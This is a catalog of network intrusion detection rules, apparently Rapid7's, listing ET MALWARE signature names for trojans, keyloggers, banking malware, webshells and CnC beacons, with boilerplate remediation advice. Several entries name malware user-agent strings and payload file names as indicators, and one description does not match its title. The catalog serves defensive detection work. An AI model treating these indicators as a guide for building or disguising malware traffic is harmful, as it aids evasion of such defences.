This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Nurjax Retrieving Domains via JS

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Ransom.Win32.Blocker.dham Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger.acqh User-Agent(EMSFRTCBVD)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(bugmaal)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(DEMO)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(DEMOMAKE)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(DSMBVCTFRE)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(FMBVDFRESCT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(folderwin)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(MBESCVDFRT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(nento)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(sendFile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(smaal)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(TCBFRVDEMS)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(UPHTTP)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(vbusers)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Spy.Win32.KeyLogger.acuj Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Spy.Win32.Zbot.qgxi Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Verblecon User Agent Observed

Description

This detection identifies malware-related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.A.FakeAV Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Antavmu.guw Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Buzus Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Codenox.gyezu CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Cosmu.xet CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Trojan/Win32.FraudPack User-Agent (Downloader MLR 1.0.0)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Genome.aetqe Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Jorik.Totem.vg HTTP request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Qadars Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.VB.cefz Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.VBKrypt.cugq/Umbra Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TROJAN Win32-WebSec Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Yakes.pwo Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TROJ_PROX.AFV POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Troj/ReRol.A Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Troj/ReRol.A Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Troxen Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrueBot/Silence.Downloader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrueBot/Silence.Downloader Keep-Alive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trustezeb Checkin to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TSPY_BANKER.IDV/Infostealer.Bancos Module Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ttint XORed CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TURLA APT CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Turla Kopiluwak User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TURLA NETFLASH CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TwoFace WebShell Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Umbra/Multibot Loader User-Agent (umbra)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Umbra/MultiBot Plugin access

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unattributed WebShell Access - Command Execution

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unattributed WebShell Access - File Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE UNC2628 BEACON Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE UNC2628 Malicious MSHTA Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unicorn Stealer Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.CoinMiner Loader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Unk.DPRK MalDoc SysInfo CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Actor Targeting Minority Groups Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Actor Targeting Minority Groups Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Actor Targeting Minority Groups CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Chinese Threat Actor Malicious Redirect Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown DPRK Threat Actor Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown - Loader - Check .exe Updated

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Mailer CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Unknown Possibly Ransomware (Dropped by RIG) CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Unknown Rootkit Checkin Activity (getSystemInfo)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Rootkit Download Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Trojan with Fake Java User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Webserver Backdoor

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.PSAttack Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.VBSLoader Retrieving Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unruy Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Binary Download Jan 02 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Common URI Struct Dec 01 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Common URI Struct Feb 12 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Common URI Struct July 15 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Downloader 2p (Zeus) May 07 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre External IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE UPDATE Protocol Trojan Communication detected on http ports 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE UPDATE Protocol Trojan Communication detected on non-http ports 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE URI Struct Observed in Pawn Storm CVE-2015-2950

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Urlzone/Bebloh/Bublik Checkin /was/uid.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Urlzone/Bebloh/Bublik Checkin /was/vas.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Urlzone/Bebloh Trojan Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Uroburos/Turla CnC (OUTBOUND) 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Uroburos/Turla CnC (OUTBOUND) 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursa Loader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (cook32.rar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (cook64.rar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (grab32.rar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (grab64.rar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant CnC Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant Retrieving Payload (x32)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant Retrieving Payload (x64)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE User-Agent in Referer Field - Likely Malware

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE User-Agent (Visbot)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE User-Agent (Xmaker)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Variant.Kazy.174106 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Variant.Strictor Dropper

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Variant.Zusy.45802 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Various Malicious AlphaNum DL Feb 10 2016

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Vawtrak HTTP CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Vawtrak/NeverQuest Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Vawtrak/NeverQuest - Post Data Form 01

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBA/TrojanDownloader.Agent.PAC Retreiving Malicious VBScript

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBKlip/ClipBanker.P Status Update

Description

